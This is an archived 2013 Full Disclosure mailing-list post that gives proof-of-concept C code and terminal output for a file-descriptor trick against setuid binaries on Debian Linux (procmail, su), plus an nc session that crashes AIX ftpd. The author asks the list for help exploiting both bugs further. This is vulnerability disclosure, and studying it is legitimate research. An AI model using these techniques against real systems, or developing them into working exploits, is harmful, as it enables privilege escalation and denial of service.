Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Super Tiny Linux and AIX bugs
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Sun, 11 Aug 2013 23:23:21 +0700

Super Tiny Linux and AIX bugs

discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013

allowed readers are h4x0rz listening to an arbritrary 2pac song,
all others please move along:>

uhh, hit em with a little tiny Linux bug.. my tiny Linux bug..

kcope () planetmars:~$ uname -a;cat /etc/debian_version
Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
7.1
kcope () planetmars:~$ cat test99.c
#include <fcntl.h>
main() {
        close(0);
        open("/proc/self/maps", O_RDONLY);
        execl("/usr/bin/procmail", "procmail", "-d", "kcope", 0);
}
kcope () planetmars:~$ gcc test99.c -o test99
kcope () planetmars:~$ >/var/mail/kcope
kcope () planetmars:~$ ./test99
kcope () planetmars:~$ cat /var/mail/kcope
08048000-0805c000 r-xp 00000000 08:01 144347     /usr/bin/procmail
0805c000-0805d000 r--p 00013000 08:01 144347     /usr/bin/procmail
0805d000-0805e000 rw-p 00014000 08:01 144347     /usr/bin/procmail
08c49000-08c6a000 rw-p 00000000 00:00 0          [heap]
b75a8000-b75b2000 r-xp 00000000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b2000-b75b3000 r--p 00009000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b3000-b75b4000 rw-p 0000a000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b4000-b75bd000 r-xp 00000000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bd000-b75be000 r--p 00008000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75be000-b75bf000 rw-p 00009000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bf000-b75d2000 r-xp 00000000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d2000-b75d3000 r--p 00012000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d3000-b75d4000 rw-p 00013000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d4000-b75d6000 rw-p 00000000 00:00 0
b75d6000-b75dc000 r-xp 00000000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dc000-b75dd000 r--p 00005000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dd000-b75de000 rw-p 00006000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75de000-b75e0000 rw-p 00000000 00:00 0
b75e0000-b773c000 r-xp 00000000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773c000-b773d000 ---p 0015c000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773d000-b773f000 r--p 0015c000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773f000-b7740000 rw-p 0015e000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7740000-b7743000 rw-p 00000000 00:00 0
b7743000-b7767000 r-xp 00000000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7767000-b7768000 r--p 00023000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7768000-b7769000 rw-p 00024000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b776e000-b7770000 rw-p 00000000 00:00 0
b7770000-b7771000 r-xp 00000000 00:00 0          [vdso]
b7771000-b778d000 r-xp 00000000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778d000-b778e000 r--p 0001b000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778e000-b778f000 rw-p 0001c000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
bfd62000-bfd83000 rw-p 00000000 00:00 0          [stack]

geez! leeks process maps of setuid root executable. should investigate deeper..

kcope () planetmars:~$ cat test99.c
#include <fcntl.h>
main() {
        close(2);
        open("/proc/self/comm", O_RDWR);
        execl("/bin/su", "su", 0);
}
kcope () planetmars:~$ ./test99

kcope () planetmars:~$ ps aux|grep su
root        12  0.0  0.0      0     0 ?        S    14:19   0:00 [sync_supers]
root      6543  0.0  0.4   4240  1128 pts/0    S+   17:58   0:00 su
kcope     6545  0.0  0.3   3568   820 pts/1    S+   17:58   0:00 grep su
You got mail in /var/mail/kcope !!

kcope () planetmars:~$ ls -la /proc/6543/comm
-rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm
kcope () planetmars:~$ cat /proc/6543/comm
Password:

its writing supplied input to root owned files!
can somebody, hello lists, give me pointers about how to exploit this, if
possible. i know this might an issue for vuln-dev but I m a rude boy!

another tiny bug in aix ftpd

kcope () planetmars:~$ nc <ip> 21
220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready.
user ftp
331 Guest login ok, send ident as password.
pass ftp
230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars
230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars
230 Guest login ok, access restrictions apply.
user root
421 ftpd: get_auth_methods() failed: Bad file number
421 root cannot authenticate to server

connection closes and ftpd might coredump..

can somebody please truss the process and tell me what file it want to open?
this might be exploitable. thanks alot!

/Kctherootkey

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Super Tiny Linux and AIX bugs king cope (Aug 11)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]